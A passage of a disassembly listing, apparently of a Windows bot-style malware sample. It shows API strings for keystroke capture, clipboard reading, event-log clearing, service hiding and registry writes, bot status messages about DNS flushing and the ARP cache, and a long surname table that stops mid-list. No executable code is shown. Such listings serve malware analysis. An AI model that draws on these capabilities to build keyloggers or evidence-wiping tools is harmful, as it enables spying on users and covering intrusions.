'LookupPrivilegeValueA',0 ; DATA XREF: sub_409B13+31Ao align 4 aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_409B13:loc_409E25o align 10h aCleareventloga db 'ClearEventLogA',0 ; DATA XREF: sub_409B13+2C6o align 10h aOpeneventloga db 'OpenEventLogA',0 ; DATA XREF: sub_409B13+2B9o align 10h aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_409B13+2ACo aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_409B13+29Fo aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_409B13+292o align 10h aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_409B13+285o align 10h aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_409B13+278o aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_409B13+270o align 10h aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_409B13:loc_409D72o align 10h aGetforegroundw db 'GetForegroundWindow',0 ; DATA XREF: sub_409B13+21Ao aGetwindowtexta db 'GetWindowTextA',0 ; DATA XREF: sub_409B13+20Do align 4 aGetkeystate db 'GetKeyState',0 ; DATA XREF: sub_409B13+200o aGetasynckeysta db 'GetAsyncKeyState',0 ; DATA XREF: sub_409B13:loc_409D0Bo align 4 aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_409B13+1A0o align 4 aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_409B13+193o align 4 aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_409B13+186o align 4 aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_409B13+179o align 4 aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_409B13+16Co align 4 aIswindow db 'IsWindow',0 ; DATA XREF: sub_409B13+15Fo align 4 aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_409B13+152o aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_409B13+14Ao align 10h aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_409B13:loc_409C48o ; sub_424D78+Do align 4 aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_409B13:loc_409C1Bo align 4 aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_409B13+A0o align 10h aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_409B13+93o aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_409B13+86o aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_409B13+79o align 4 aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_409B13+6Co aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_409B13+5Fo aModule32first db 'Module32First',0 ; DATA XREF: sub_409B13+52o align 10h aProcess32next db 'Process32Next',0 ; DATA XREF: sub_409B13+45o align 10h aProcess32first db 'Process32First',0 ; DATA XREF: sub_409B13+38o align 10h aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_409B13+2Bo align 4 aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_409B13+23o align 4 aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_409B13+Ao align 4 unk_42DA2C db 2Dh ; - ; DATA XREF: sub_40A7CF+2F2o db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aDllTestComplet db 'DLL test complete.',0 align 4 aAvicap32_dllFa db 'Avicap32.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+2CCo align 4 aOdbc32_dllFail db 'Odbc32.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+298o aShell32_dllFai db 'Shell32.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+264o align 4 aMpr32_dllFaile db 'Mpr32.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+230o align 4 aIphlpapi_dllFa db 'Iphlpapi.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+1FCo align 10h aDnsapi_dllFail db 'Dnsapi.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+1C8o aNetapi32_dllFa db 'Netapi32.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+194o align 4 aIcmp_dllFailed db 'Icmp.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+160o align 4 aWininet_dllFai db 'Wininet.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+12Co align 4 aWs2_32_dllFail db 'Ws2_32.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+F8o aGdi32_dllFaile db 'Gdi32.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+C4o align 4 aAdvapi32_dllFa db 'Advapi32.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+90o align 4 aUser32_dllFail db 'User32.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+5Co aKernel32_dllFa db 'Kernel32.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+28o align 4 a_: ; DATA XREF: sub_40D99C+10o ; sub_40F96B+252o unicode 0, <.>,0 unk_42DBBC db 2Dh ; - ; DATA XREF: sub_40AB32:loc_40ABF1o db 3, 34h, 2 db 66h ; f db 6Ch, 75h, 73h db 68h ; h db 64h, 6Eh, 73h db 2 db 3, 2Dh, 20h aNotSupportedBy db 'not supported by this system',0 align 4 unk_42DBEC db 2Dh ; - ; DATA XREF: sub_40AB32:loc_40ABBFo db 3, 34h, 2 db 66h ; f db 6Ch, 75h, 73h db 68h ; h db 64h, 6Eh, 73h db 2 db 3, 2Dh, 20h aUnableToAlloca db 'unable to allocate ARP cache',0 align 4 unk_42DC1C db 2Dh ; - ; DATA XREF: sub_40AB32:loc_40AB8Bo db 3, 34h, 2 db 66h ; f db 6Ch, 75h, 73h db 68h ; h db 64h, 6Eh, 73h db 2 db 3, 2Dh, 20h aArpCacheIsEmpt db 'ARP cache is empty',0 align 10h unk_42DC40 db 2Dh ; - ; DATA XREF: sub_40AB32+49o db 3, 34h, 2 db 66h ; f db 6Ch, 75h, 73h db 68h ; h db 64h, 6Eh, 73h db 2 db 3, 2Dh, 20h aErrorGettingAr db 'error getting ARP cache: %d',0 aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_40AC10+46o ; sub_40BFEC+38o ... aReal db 'real',0 align 10h dd 0 dword_42DC84 dd 0 ; DATA XREF: sub_40B08E+7o off_42DC88 dd offset sub_40ACB6 ; DATA XREF: sub_40B08E+49r aConst db 'const',0 align 8 dd 1, 40AD23h, 7474656Ch, 7265h, 0 dd 2, 40AD81h, 706D6F63h, 2 dup(0) dd 3, 40ADCEh, 6E756F63h, 797274h, 0 dd 4, 40AE6Ch, 736Fh, 2 dup(0) dd 5, 40AEE1h off_42DCF0 dd offset aAbdulrazak ; DATA XREF: sub_40ACB6+21r ; "Abdulrazak" dd offset aAckerman ; "Ackerman" dd offset aAdams ; "Adams" off_42DCFC dd offset aAddison ; DATA XREF: sub_40B08E+39o ; "Addison" dd offset aAdelstein ; "Adelstein" dd offset aAdibe ; "Adibe" dd offset aAdorno ; "Adorno" dd offset aAhlers ; "Ahlers" dd offset aAlavi ; "Alavi" dd offset aAlcorn ; "Alcorn" dd offset aAlda ; "Alda" dd offset aAleks ; "Aleks" dd offset aAllison ; "Allison" dd offset aAlongi ; "Alongi" dd offset aAltavilla ; "Altavilla" dd offset aAltenberger ; "Altenberger" dd offset aAltenhofen ; "Altenhofen" dd offset aAmaral ; "Amaral" dd offset aAmatangelo ; "Amatangelo" dd offset aAmeer ; "Ameer" dd offset aAmsden ; "Amsden" dd offset aAnand ; "Anand" dd offset aAndel ; "Andel" dd offset aAndo ; "Ando" dd offset aAndrelus ; "Andrelus" dd offset aAndron ; "Andron" dd offset aAnfinrud ; "Anfinrud" dd offset aAnsley ; "Ansley" dd offset aAnthony ; "Anthony" dd offset aAntos ; "Antos" dd offset aArbia ; "Arbia" dd offset aArduini ; "Arduini" dd offset aArellano ; "Arellano" dd offset aAristotle ; "Aristotle" dd offset aArjas ; "Arjas" dd offset aArky ; "Arky" dd offset aAtkins ; "Atkins" dd offset aAugustus ; "Augustus" dd offset aAurelius ; "Aurelius" dd offset aAxelrod ; "Axelrod" dd offset aAxworthy ; "Axworthy" dd offset aAyiemba ; "Ayiemba" dd offset aAykroyd ; "Aykroyd" dd offset aAyling ; "Ayling" dd offset aAzima ; "Azima" dd offset aBachmuth ; "Bachmuth" dd offset aBackus ; "Backus" dd offset aBady ; "Bady" dd offset aBaglivo ; "Baglivo" dd offset aBagnold ; "Bagnold" dd offset aBailar ; "Bailar" dd offset aBakanowsky ; "Bakanowsky" dd offset aBaleja ; "Baleja" dd offset aBallatori ; "Ballatori" dd offset aBallew ; "Ballew" dd offset aBaltz ; "Baltz" dd offset aBanta ; "Banta" dd offset aBarabesi ; "Barabesi" dd offset aBarajas ; "Barajas" dd offset aBaranczak ; "Baranczak" dd offset aBaranowska ; "Baranowska" dd offset aBarberi ; "Barberi" dd offset aBarbetti ; "Barbetti" dd offset aBarneson ; "Barneson" dd offset aBarnett ; "Barnett" dd offset aBarriola ; "Barriola" dd offset aBarry ; "Barry" dd offset aBartholomew ; "Bartholomew" dd offset aBartolome ; "Bartolome" dd offset aBartoo ; "Bartoo" dd offset aBasavappa ; "Basavappa" dd offset aBashevis ; "Bashevis" dd offset aBatchelder ; "Batchelder" dd offset aBaumiller ; "Baumiller" dd offset aBayles ; "Bayles" dd offset aBayo ; "Bayo" dd offset aBeacon ; "Beacon" dd offset aBeal ; "Beal" dd offset aBean ; "Bean" dd offset aBeckman ; "Beckman" dd offset aBeder ; "Beder" dd offset aBedford ; "Bedford" dd offset aBehenna ; "Behenna" dd offset aBelanger ; "Belanger" dd offset aBelaoussof ; "Belaoussof" dd offset aBelfer ; "Belfer" dd offset aBelinCollart ; "Belin-Collart" dd offset aBellavance ; "Bellavance" dd offset aBellhouse ; "Bellhouse" dd offset aBellini ; "Bellini" dd offset aBelloc ; "Belloc" dd offset aBenedictDye ; "Benedict-Dye" dd offset aBergson ; "Bergson" dd offset aBerkeJenkins ; "Berke-Jenkins" dd offset aBernardo ; "Bernardo" dd offset aBernassola ; "Bernassola" dd offset aBernston ; "Bernston" dd offset aBerrizbeitia ; "Berrizbeitia" dd offset aBetti ; "Betti" dd offset aBeynart ; "Beynart" dd offset aBiagioli ; "Biagioli" dd offset aBickel ; "Bickel" dd offset aBinion ; "Binion" dd offset aBir ; "Bir" dd offset aBisema ; "Bisema" dd offset aBisho ; "Bisho" dd offset aBlackbourn ; "Blackbourn" dd offset aBlackwell ; "Blackwell" dd offset aBlagg ; "Blagg" dd offset aBlakemore ; "Blakemore" dd offset aBlanke ; "Blanke" dd offset aBliss ; "Bliss" dd offset aBlizard ; "Blizard" dd offset aBloch ; "Bloch" dd offset aBloembergen ; "Bloembergen" dd offset aBloemhof ; "Bloemhof" dd offset aBloxham ; "Bloxham" dd offset aBlyth ; "Blyth" dd offset aBolger ; "Bolger" dd offset aBolick ; "Bolick" dd offset aBollinger ; "Bollinger" dd offset aBologna ; "Bologna" dd offset aBoner ; "Boner" dd offset aBonham ; "Bonham" dd offset aBoniface ; "Boniface" dd offset aBontempo ; "Bontempo" dd offset aBook ; "Book" dd offset aBookbinder ; "Bookbinder" dd offset aBoone ; "Boone" dd offset aBoorstin ; "Boorstin" dd offset aBorack ; "Borack" dd offset aBorden ; "Borden" dd offset aBossi ; "Bossi" dd offset aBothman ; "Bothman" dd offset aBotosh ; "Botosh" dd offset aBoudin ; "Boudin" dd offset aBoudrot ; "Boudrot" dd offset aBourneuf ; "Bourneuf" dd offset aBowers ; "Bowers" dd offset aBoxer ; "Boxer" dd offset aBoyajian ; "Boyajian" dd offset aBoyes ; "Boyes" dd offset aBoyland ; "Boyland" dd offset aBoym ; "Boym" dd offset aBoyne ; "Boyne" dd offset aBracalente ; "Bracalente" dd offset aBradac ; "Bradac" dd offset aBradach ; "Bradach" dd offset aBrecht ; "Brecht" dd offset aBreed ; "Breed" dd offset aBrenan ; "Brenan" dd offset aBrennan ; "Brennan" dd offset aBrewer ; "Brewer" dd offset aBrewer ; "Brewer" dd offset aBridgeman ; "Bridgeman" dd offset aBridges ; "Bridges" dd offset aBrinton ; "Brinton" dd offset aBritz ; "Britz" dd offset aBroca ; "Broca" dd offset aBrook ; "Brook" dd offset aBrzycki ; "Brzycki" dd offset aBuchan ; "Buchan" dd offset aBudding ; "Budding" dd offset aBullard ; "Bullard" dd offset aBunton ; "Bunton" dd offset aBurden ; "Burden" dd offset aBurdzy ; "Burdzy" dd offset aBurke ; "Burke" dd offset aBurridge ; "Burridge" dd offset aBusetta ; "Busetta" dd offset aByatt ; "Byatt" dd offset aByerly ; "Byerly" dd offset aByrd ; "Byrd" dd offset aCage ; "Cage" dd offset aCalnan ; "Calnan" dd offset aCammelli ; "Cammelli" dd offset aCammilleri ; "Cammilleri" dd offset aCanley ; "Canley" dd offset aCapanni ; "Capanni" dd offset aCaperton ; "Caperton" dd offset aCapocaccia ; "Capocaccia" dd offset aCapodilupo ; "Capodilupo" dd offset aCappuccio ; "Cappuccio" dd offset aCapursi ; "Capursi" dd offset aCaratozzolo ; "Caratozzolo" dd offset aCarayannopoulo ; "Carayannopoulos" dd offset aCarlin ; "Carlin" dd offset aCarlos ; "Carlos" dd offset aCarlyle ; "Carlyle" dd offset aCarmichael ; "Carmichael" dd offset aCaroti ; "Caroti" dd offset aCarper ; "Carper" dd offset aCartmill ; "Cartmill" dd offset aCascio ; "Cascio" dd offset aCase ; "Case" dd offset aCaspar ; "Caspar" dd offset aCastelda ; "Castelda" dd offset aCavanagh ; "Cavanagh" dd offset aCavell ; "Cavell" dd offset aCeniceros ; "Ceniceros" dd offset aCerioli ; "Cerioli" dd offset aChapman ; "Chapman" dd offset aCharles ; "Charles" dd offset aCheang ; "Cheang" dd offset aCherry ; "Cherry" dd offset aChervinsky ; "Chervinsky" dd offset aChiassino ; "Chiassino" dd offset aChien ; "Chien" dd offset aChildress ; "Childress" dd offset aChilds ; "Childs" dd offset aChinipardaz ; "Chinipardaz" dd offset aChinman ; "Chinman" dd offset aChristenson ; "Christenson" dd offset aChristian ; "Christian" dd offset aChristiano ; "Christiano" dd offset aChristie ; "Christie" dd offset aChristopher ; "Christopher" dd offset aChu ; "Chu" dd offset aChupasko ; "Chupasko" dd offset aChurch ; "Church" dd offset aCiampaglia ; "Ciampaglia" dd offset aCicero ; "Cicero" dd offset aCifarelli ; "Cifarelli" dd offset aClaffey ; "Claffey" dd offset aClancy ; "Clancy" dd offset aClark ; "Clark" dd offset aClement ; "Clement" dd offset aClifton ; "Clifton" dd offset aClow ; "Clow" dd offset aCoblenz ; "Coblenz" dd offset aCoito ; "Coito" dd offset aColdren ; "Coldren" dd offset aColella ; "Colella" dd offset aCollard ; "Collard" dd offset aCollis ; "Collis" dd offset aCompton ; "Compton" dd offset aCompton ; "Compton" dd offset aComstock ; "Comstock" dd offset aConcino ; "Concino" dd offset aCondodina ; "Condodina" dd offset aConnors ; "Connors" dd offset aCorey ; "Corey" dd offset aCornish ; "Cornish" dd offset aCosmides ; "Cosmides" dd offset aCounter ; "Counter" dd offset aCoutaux ; "Coutaux" dd offset aCrawford ; "Crawford" dd offset aCrocker ; "Crocker" dd offset aCroshaw ; "Croshaw" dd offset aCroxen ; "Croxen" dd offset aCroxton ; "Croxton" dd offset aCui ; "Cui" dd offset aCurrier ; "Currier" dd offset aCutler ; "Cutler" dd offset aCvek ; "Cvek" dd offset aCyders ; "Cyders" dd offset aDasilva ; "daSilva" dd offset aDaldalian ; "Daldalian" dd offset aDaly ; "Daly" dd offset aDAmbra ; "D'Ambra" dd offset aDanieli ; "Danieli" dd offset aDante ; "Dante" dd offset aDapice ; "Dapice" dd offset aDArcangelo ; "D'arcangelo" dd offset aDas ; "Das" dd offset aDasgupta ; "Dasgupta" dd offset aDaskalu ; "Daskalu" dd offset aDavid ; "David" dd offset aDawkins ; "Dawkins" dd offset aDegennaro ; "DeGennaro" dd offset aDelapena ; "DeLaPena" dd offset aDelEnclos ; "del'Enclos" dd offset aDerousse ; "deRousse" dd offset aDebroff ; "Debroff" dd offset aDees ; "Dees" dd offset aDefeciani ; "Defeciani" dd offset aDelattre ; "Delattre" dd offset aDeleonRendon ; "Deleon-Rendon" dd offset aDelger ; "Delger" dd offset aDellAcqua ; "Dell'acqua" dd offset aDeming ; "Deming" dd offset aDempster ; "Dempster" dd offset aDemusz ; "Demusz" dd offset aDenault ; "Denault" dd offset aDenham ; "Denham" dd offset aDenison ; "Denison" dd offset aDesombre ; "Desombre" dd offset aDeutsch ; "Deutsch" dd offset aDFini ; "D'fini" dd offset aDicks ; "Dicks" dd offset aDiefenbach ; "Diefenbach" dd offset aDifabio ; "Difabio" dd offset aDifronzo ; "Difronzo" dd offset aDilworth ; "Dilworth" dd offset aDionysius ; "Dionysius" dd offset aDirksen ; "Dirksen" dd offset aDockery ; "Dockery" dd offset aDoherty ; "Doherty" dd offset aDonahue ; "Donahue" dd offset aDonner ; "Donner" dd offset aDoonan ; "Doonan" dd offset aDore ; "Dore" dd offset aDorf ; "Dorf" dd offset aDosi ; "Dosi" dd offset aDoty ; "Doty" dd offset aDoug ; "Doug" dd offset aDowsland ; "Dowsland" dd offset aDrinker ; "Drinker" dd offset aDSouza ; "D'souza" dd offset aDuffin ; "Duffin" dd offset aDurrett ; "Durrett" dd offset aDussault ; "Dussault" dd offset aDwyer ; "Dwyer" dd offset aEardley ; "Eardley" dd offset aEbeling ; "Ebeling" dd offset aEckel ; "Eckel" dd offset aEdley ; "Edley" dd offset aEdner ; "Edner" dd offset aEdward ; "Edward" dd offset aEickenhorst ; "Eickenhorst" dd offset aEliasson ; "Eliasson" dd offset aElmendorf ; "Elmendorf" dd offset aElmerick ; "Elmerick" dd offset aElvis ; "Elvis" dd offset aEncinas ; "Encinas" dd offset aEnyeart ; "Enyeart" dd offset aEppling ; "Eppling" dd offset aErbach ; "Erbach" dd offset aErdman ; "Erdman" dd offset aErdos ; "Erdos" dd offset aErez ; "Erez" dd offset aEspinoza ; "Espinoza" dd offset aEstes ; "Estes" dd offset aEtter ; "Etter" dd offset aEuripides ; "Euripides" dd offset aEverett ; "Everett" dd offset aFabbris ; "Fabbris" dd offset aFagan ; "Fagan" dd offset aFaioes ; "Faioes" dd offset aFalcoAcosta ; "Falco-Acosta" dd offset aFalorsi ; "Falorsi" dd offset aFaris ; "Faris" dd offset aFarone ; "Farone" dd offset aFarren ; "Farren" dd offset aFasso ; "Fasso'" dd offset aFates ; "Fates" dd offset aFeigenbaum ; "Feigenbaum" dd offset aFejzo ; "Fejzo" dd offset aFeldman ; "Feldman" dd offset aFernald ; "Fernald" dd offset aFernandes ; "Fernandes" dd offset aFerrante ; "Ferrante" dd offset aFerriell ; "Ferriell" dd offset aFeuer ; "Feuer" dd offset aFido ; "Fido" dd offset aField ; "Field" dd offset aFink ; "Fink" dd offset aFinkelstein ; "Finkelstein" dd offset aFinnegan ; "Finnegan" dd offset aFiorina ; "Fiorina" dd offset aFisk ; "Fisk" dd offset aFitzmaurice ; "Fitzmaurice" dd offset aFlier ; "Flier" dd offset aFlores ; "Flores" dd offset aFolks ; "Folks" dd offset aForester ; "Forester" dd offset aFortes ; "Fortes" dd offset aFortier ; "Fortier" dd offset aFossey ; "Fossey" dd offset aFossi ; "Fossi" dd offset aFrancisco ; "Francisco" dd offset aFranklinKenea ; "Franklin-Kenea" dd offset aFranz ; "Franz" dd offset aFrazierDavis ; "Frazier-Davis" dd offset aFreid ; "Freid" dd offset aFreundlich ; "Freundlich" dd offset aFried ; "Fried" dd offset aFriedland ; "Friedland" dd offset aFrisken ; "Frisken" dd offset aFrowiss ; "Frowiss" dd offset aFryberger ; "Fryberger" dd offset aFrye ; "Frye" dd offset aFujiiAbe ; "Fujii-Abe" dd offset aFuller ; "Fuller" dd offset aFurth ; "Furth" dd offset aFusaro ; "Fusaro" dd offset aGabrielli ; "Gabrielli" dd offset aGaggiotti ; "Gaggiotti" dd offset aGaleotti ; "Galeotti" dd offset aGalwey ; "Galwey" dd offset aGambini ; "Gambini" dd offset aGarfield ; "Garfield" dd offset aGarman ; "Garman" dd offset aGaronna ; "Garonna" dd offset aGeller ; "Geller" dd offset aGemberling ; "Gemberling" dd offset aGeorgi ; "Georgi" dd offset aGerrett ; "Gerrett" dd offset aGhorai ; "Ghorai" dd offset aGibbens ; "Gibbens" dd offset aGibson ; "Gibson" dd offset aGilbert ; "Gilbert" dd offset aGili ; "Gili" dd offset aGill ; "Gill" dd offset aGillispie ; "Gillispie" dd offset aGist ; "Gist" dd offset aGleason ; "Gleason" dd offset aGlegg ; "Glegg" dd offset aGlendon ; "Glendon" dd offset aGoldfarb ; "Goldfarb" dd offset aGoncalves ; "Goncalves" dd offset aGood ; "Good" dd offset aGoodearl ; "Goodearl" dd offset aGoody ; "Goody" dd offset aGozzi ; "Gozzi" dd offset aGravell ; "Gravell" dd offset aGreenberg ; "Greenberg" dd offset aGreenfeld ; "Greenfeld" dd offset aGriffiths ; "Griffiths" dd offset aGrigoletto ; "Grigoletto" dd offset aGrummell ; "Grummell" dd offset aGruner ; "Gruner" dd offset aGruppe ; "Gruppe" dd offset aGuenthart ; "Guenthart" dd offset aGunn ; "Gunn" dd offset aGuo ; "Guo" dd offset aHa ; "Ha" dd offset aHaar ; "Haar" dd offset aHackman ; "Hackman" dd offset aHackshaw ; "Hackshaw" dd offset aHaley ; "Haley" dd offset aHalkias ; "Halkias" dd offset aHallowell ; "Hallowell" dd offset aHalpert ; "Halpert" dd offset aHambarzumjan ; "Hambarzumjan" dd offset aHamer ; "Hamer" dd offset aHammerness ; "Hammerness" dd offset aHand ; "Hand" dd offset aHanssen ; "Hanssen" dd offset aHarding ; "Harding" dd offset aHargraves ; "Hargraves" dd offset aHarlow ; "Harlow" dd offset aHarrigan ; "Harrigan" dd offset aHartman ; "Hartman" dd offset aHartmann ; "Hartmann" dd offset aHartnett ; "Hartnett" dd offset aHarwell ; "Harwell" dd offset aHaviaras ; "Haviaras" dd offset aHawkes ; "Hawkes" dd offset aHayes ; "Hayes" dd offset aHaynes ; "Haynes" dd offset aHazlewood ; "Hazlewood" dd offset aHeermans ; "Heermans" dd offset aHeft ; "Heft" dd offset aHeiland ; "Heiland" dd offset aHellman ; "Hellman" dd offset aHellmiss ; "Hellmiss" dd offset aHelprin ; "Helprin" dd offset aHemphill ; "Hemphill" dd offset aHenery ; "Henery" dd offset aHenrichs ; "Henrichs" dd offset aHernandez ; "Hernandez" dd offset aHerrera ; "Herrera" dd offset aHester ; "Hester" dd offset aHeubert ; "Heubert" dd offset aHeyeck ; "Heyeck" dd offset aHimmelfarb ; "Himmelfarb" dd offset aHind ; "Hind" dd offset aHirst ; "Hirst" dd offset aHitchcock ; "Hitchcock" dd offset aHoang ; "Hoang" dd offset aHock ; "Hock" dd offset aHoffer ; "Hoffer" dd offset aHoffman ; "Hoffman" dd offset aHokanson ; "Hokanson" dd offset aHokoda ; "Hokoda" dd offset aHolmes ; "Holmes" dd offset aHoloien ; "Holoien" dd offset aHolter ; "Holter" dd offset aHolway ; "Holway" dd offset aHolzman ; "Holzman" dd offset aHooker ; "Hooker" dd offset aHopkins ; "Hopkins" dd offset aHorsley ; "Horsley" dd offset aHoshida ; "Hoshida" dd offset aHostage ; "Hostage" dd offset aHottle ; "Hottle" dd offset aHoward ; "Howard" dd offset aHoy ; "Hoy" dd offset aHuey ; "Huey" dd offset aHuidekoper ; "Huidekoper" dd offset aHungerford ; "Hungerford" dd offset aHuntington ; "Huntington" dd offset aHupp ; "Hupp" dd offset aHurtubise ; "Hurtubise" dd offset aHutchings ; "Hutchings" dd offset aHyde ; "Hyde" dd offset aIaquinta ; "Iaquinta" dd offset aIchikawa ; "Ichikawa" dd offset aIgarashi ; "Igarashi" dd offset aInamura ; "Inamura" dd offset aInniss ; "Inniss" dd offset aIsaac ; "Isaac" dd offset aIsaievych ; "Isaievych" dd offset aIsbill ; "Isbill" dd offset aIsserman ; "Isserman" dd offset aIyer ; "Iyer" dd offset aJacenko ; "Jacenko" dd offset aJackson ; "Jackson" dd offset aJagers ; "Jagers" dd offset aJagger ; "Jagger" dd offset aJagoe ; "Jagoe" dd offset aJain ; "Jain" dd offset aJamil ; "Jamil" dd offset aJanjigian ; "Janjigian" dd offset aJarnagin ; "Jarnagin" dd offset aJarrell ; "Jarrell" dd offset aJay ; "Jay" dd offset aJeffers ; "Jeffers" dd offset aJellis ; "Jellis" dd offset aJenkins ; "Jenkins" dd offset aJespersen ; "Jespersen" dd offset aJewett ; "Jewett" dd offset aJohannesson ; "Johannesson" dd offset aJohannsen ; "Johannsen" dd offset aJohns ; "Johns" dd offset aJolly ; "Jolly" dd offset aJorgensen ; "Jorgensen" dd offset aJucks ; "Jucks" dd offset aJuliano ; "Juliano" dd offset aJulious ; "Julious" dd offset aKabbash ; "Kabbash" dd offset aKaboolian ; "Kaboolian" dd offset aKafadar ; "Kafadar" dd offset aKalbfleisch ; "Kalbfleisch" dd offset aKaligian ; "Kaligian" dd offset aKalil ; "Kalil" dd offset aKalinowski ; "Kalinowski" dd offset aKalman ; "Kalman" dd offset aKamel ; "Kamel" dd offset aKangis ; "Kangis" dd offset aKarpouzes ; "Karpouzes" dd offset aKassower ; "Kassower" dd offset aKasten ; "Kasten" dd offset aKawachi ; "Kawachi" dd offset aKee ; "Kee" dd offset aKeenan ; "Keenan" dd offset aKeepper ; "Keepper" dd offset aKeith ; "Keith" dd offset aKelker ; "Kelker" dd offset aKelsey ; "Kelsey" dd offset aKempton ; "Kempton" dd offset aKemsley ; "Kemsley" dd offset aKendall ; "Kendall" dd offset aKerry ; "Kerry" dd offset aKeul ; "Keul" dd offset aKhong ; "Khong" dd offset aKimmel ; "Kimmel" dd offset aKimmett ; "Kimmett" dd offset aKimura ; "Kimura" dd offset aKindall ; "Kindall" dd offset aKinsley ; "Kinsley" dd offset aKippenberger ; "Kippenberger" dd offset aKirscht ; "Kirscht" dd offset aKittridge ; "Kittridge" dd offset aKleckner ; "Kleckner" dd offset aKleiman ; "Kleiman" dd offset aKleinfelder ; "Kleinfelder" dd offset aKlemperer ; "Klemperer" dd offset aKling ; "Kling" dd offset aKlinkenborg ; "Klinkenborg" dd offset aKlint ; "Klint" dd offset aKnuff ; "Knuff" dd offset aKobrick ; "Kobrick" dd offset aKoch ; "Koch" dd offset aKohn ; "Kohn" dd offset aKoivumaki ; "Koivumaki" dd offset aKommer ; "Kommer" dd offset aKoniaris ; "Koniaris" dd offset aKonrad ; "Konrad" dd offset aKool ; "Kool" dd offset aKorzybski ; "Korzybski" dd offset aKotter ; "Kotter" dd offset aKovaks ; "Kovaks" dd offset aKraemer ; "Kraemer" dd offset aKrailo ; "Krailo" dd offset aKrasney ; "Krasney" dd offset aKraus ; "Kraus" dd offset aKroemer ; "Kroemer" dd offset aKrysiak ; "Krysiak" dd offset aKuenzli ; "Kuenzli" dd offset aKumar ; "Kumar" dd offset aKusman ; "Kusman" dd offset aKuwabara ; "Kuwabara" dd offset aLa ; "La" dd offset aLabunka ; "Labunka" dd offset aLafler ; "Lafler" dd offset aLaing ; "Laing" dd offset aLallemant ; "Lallemant" dd offset aLandes ; "Landes" dd offset aLankes ; "Lankes" dd offset aLantieri ; "Lantieri" dd offset aLanzit ; "Lanzit" dd offset aLaserna ; "Laserna" dd offset aLashley ; "Lashley" dd offset aLawless ; "Lawless" dd offset aLecar ; "Lecar" dd offset aLecce ; "Lecce" dd offset aLeclercq ; "Leclercq" dd offset aLeite ; "Leite" dd offset aLenard ; "Lenard" dd offset aLEnclos ; "l'Enclos" dd offset aLesser ; "Lesser" dd offset aLessi ; "Lessi" dd offset aLiakos ; "Liakos" dd offset aLidano ; "Lidano" dd offset aLiem ; "Liem" dd offset aLight ; "Light" dd offset aLightfoot ; "Lightfoot" dd offset aLim ; "Lim" dd offset aLinares ; "Linares" dd offset aLinda ; "Linda" dd offset aLinder ; "Linder" dd offset aLine ; "Line" dd offset aLinehan ; "Linehan" dd offset aLinzee ; "Linzee" dd offset aLippmann ; "Lippmann" dd offset aLipponen ; "Lipponen" dd offset aLittle ; "Little" dd offset aLitvak ; "Litvak" dd offset aLivernash ; "Livernash" dd offset aLivi ; "Livi" dd offset aLivolsi ; "Livolsi" dd offset aLizardo ; "Lizardo" dd offset aLocatelli ; "Locatelli" dd offset aLongworth ; "Longworth" dd offset aLoss ; "Loss" dd offset aLoveman ; "Loveman" dd offset aLowenstein ; "Lowenstein" dd offset aLoza ; "Loza" dd offset aLubin ; "Lubin" dd offset aLucas ; "Lucas" dd offset aLuciano ; "Luciano" dd offset aLuczkow ; "Luczkow" dd offset aLuecke ; "Luecke" dd offset aLunetta ; "Lunetta" dd offset aLuoma ; "Luoma" dd offset aLussier ; "Lussier" dd offset aLutcavage ; "Lutcavage" dd offset aLuzader ; "Luzader" dd offset aMa ; "Ma" dd offset aMaccormac ; "Maccormac" dd offset aMacdonald ; "Macdonald" dd offset aMaceachern ; "Maceachern" dd offset aMacintyre ; "Macintyre" dd offset aMackenney ; "Mackenney" dd offset aMacmillan ; "MacMillan" dd offset aMacy ; "Macy" dd offset aMadigan ; "Madigan" dd offset aMaggio ; "Maggio" dd offset aMahony ; "Mahony" dd offset aMaier ; "Maier" dd offset aMaineHershey ; "Maine-Hershey" dd offset aMaisano ; "Maisano" dd offset aMalatesta ; "Malatesta" dd offset aMaller ; "Maller" dd offset aMalova ; "Malova" dd offset aManalis ; "Manalis" dd offset aMandel ; "Mandel" dd offset aManganiello ; "Manganiello" dd offset aMantovan ; "Mantovan" dd offset aMarch ; "March" dd 